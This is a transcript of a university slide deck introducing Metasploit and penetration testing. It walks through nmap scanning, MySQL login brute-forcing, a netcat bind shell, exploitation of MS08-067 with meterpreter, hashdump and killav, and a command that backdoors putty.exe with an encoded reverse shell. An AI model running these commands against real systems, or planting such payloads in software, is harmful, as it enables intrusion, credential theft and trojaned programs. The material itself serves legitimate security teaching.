Metasploit: Pwnage and Ponies
Embed Size (px)
Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing. The practical section that Etienne made (with Ponies) will come soon.
Transcript of Metasploit: Pwnage and Ponies
- 1. The Metasploit Framework Vast collection of exploits, payloads and encoders. Modules for vulnerability scanning and information gathering. Modules for exploitation and session management. Modules for post exploitation, pivoting and getting all up in ur base.
- 2. BasicsExploits and PayloadsBy exploiting part of a system you interact with it in a manner not anticipated by the developers withthe end goal of getting your own code(payload)/logic to execute.Pentesting == Legal Le Hacking PTES Watered down process Information Gathering port scans, service enumeration, mapping the attack vector. Testing payloads against AV, making sure everything is ready. Exploitation Attacking hosts. Compromise from any angle. Post Exploitation Pivot -> back to information gathering -> Exploitation This time should be faster Password re-use Passwords to crack pass the hash/token You might already have DA, so just go and find what youre after.
- 3. Different kinds of Pentest Web Applications See OWASP SQLi, XSS, Csrf, directory traversal, broken authentication, session management, access controls, reflected attacks, breaking application logic, client side attacks, information disclosure Footprint What hosts/services are visible to public networks, information disclosure, forgotten hosts, incorrectly configured hardware. Infrastructure Attacking hosts on a network, often internal to an organization or hosts found during the footprint. Targeting hosts - OS and services (out dated/unpatched), weak password, incorrectly configured applications, zero days. Targeting infrastructure - Routers and switches, IDS/IPS capabilities
- 4. nmap primer nmap is a port scanner and OS/service fingerprinting tool. It has become even more, welcome the NSE Vuln checking and much more.Basic Scanning:nmap -sS 10.0.0.1-100 -p80nmap -sS -O -A 10.0.0.55nmap -oX - 10.0.0.1/24In msfconsole (once you have a database connected)msf > db_connect :@127.0.0.1/my_msf_dbCheck that you are connected by using:msf > db_statusdb_nmap
- 5. Interacting with MetasploitmsfconsoleMost used, feature rich, well supported. This is where the magic happens, make sure you run it asroot.root@bt5:/# msfconsolemsf >msfcliFocused towards scripting and interaction with other command line tools. Sexy one liners.armitageThe metasploit GUI, nice for fuzzing but lets stick to msfconsole.Some of the other components you might use:msfpayload, msfencode, msfvenomOther bits of awesome:karmasploit, SET, Wmap
- 6. Metasploit DBFirst create a user and databaseroot@bt5:/# su postgrespostgres@bt5:/# createuser foobar -PEnter password for new role:Enter it again:Shall the new role be a superuser? (y/n) nShall the new role be allowed to create databases? (y/n) nShall the new role be allowed to create more new roles? (y/n) npostgres@bt5:/# createdb --owner=foobar foo_dbThen in msfconsole conenct to the databasemsf > db_connect foobar:@127.0.0.1/foo_dbFrom now on you can work with the database in msfconsole, db_nmap will save nmap results to thedatabase automaticly
- 7. Basic Commands use info show options set show payloads exploits auxiliary options search string that will make your day, "show vnc" back
- 8. Brute Force AttacksLets do a brute force dictionary attack on mysql server(s)First step is to find hosts running mysqlnmap -sV -p3306 --open If that returns some hosts, you can target a specific one or if your lazy,skip the nmap scan and do it directly with the metasploit mysql login scannermsf > use auxiliary/scanner/mysql/mysql_loginmsf > set USERPASS /home/me/short.txtmsf > set RHOSTS msf > exploit
- 9. ShellzA shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel.Bind ShellA bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (oranyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exeReverse ShellCreates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT,this would stop you in your tracks if you tried to create a bind shell (unless you had alreadycompromised their router and setup port forwarding). So if your target does not have a publiclyaccessible IP (but you do) use a reverse shell. NAT lolwutMeterpreter ShellThe meta interpreter is a payload that provides complex and advanced functionality, all functionsloaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton ofbuilt in features that will save you a lot of time and effort. Some useful meterpreter commands arecovered later, use the following for navigating sessions.meterpreter > backgroundmsf > sessionsmsf > sessions -i
- 10. The Art of ExploitationInformation Gatheringmsf > db_nmap -sS -O -A 192.168.24.134Now lets check for MS08-067 since its running XP < sp 3msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134msf > vulns
- 11. The Art of ExploitationConfirming vulnerability, ready exploitmsf > vulns showed us that the host was indeed vulnerable[*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008-4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path StackCorruption,NSS-34476Time to use our first exploit, first search for it:msf > search ms08-067 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path StackCorruptionTime to load the exploit:msf > use exploit/windows/smb/ms08_067_netapiUse show options || payloads to see the configuration options available.msf exploit(ms08_067_netapi) > show optionsmsf exploit(ms08_067_netapi) > show payloads
- 12. The Art of ExploitationConfigure the exploitmsf exploit(ms08_067_netapi) > set RHOST 192.168.24.134RHOST => 192.168.24.134msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcpmsf exploit(ms08_067_netapi) > show optionsEverything looks good, now run the exploit
- 13. The Art of Post ExploitationMeterpreter commands of interest:meterpreter > hashdumpmeterpreter > shellCurrent user, working directory and process IDmeterpreter > getuidmeterpreter > pwdmeterpreter > getpidNow you can migrate to a more reliable process, although not really necessary in this casemeterpreter > psmeterpreter > migrate Some funmeterpreter > screenshotmeterpreter > run vncmeterpreter > run killav
- 14. MSFpayloadUsed to create payloads on their own, sharing is caring.msfpayload linux/x64/shell_reverse_tcp LHOST=188.8.131.52 LPORT=4444 x > funkytown.exeStealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload tolaunch in a separate thread (does not work with all executables, test, test, test)root@bt:/# msfpayload windows/shell_reverse_tcp R | msfencode -t exe -x putty.exe -ovar/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
- 15. Multi-handler You have a payload The user will execute it (or you might) How do you handle the connection? Welcome to the multi-handler.root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15LPORT=6666 E[*] Please wait while we load the module tree...[*] Started reverse handler on 10.0.0.15:6666[*] Starting the payload handler...[*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129)C:Documents and SettingsAdministratorMy Do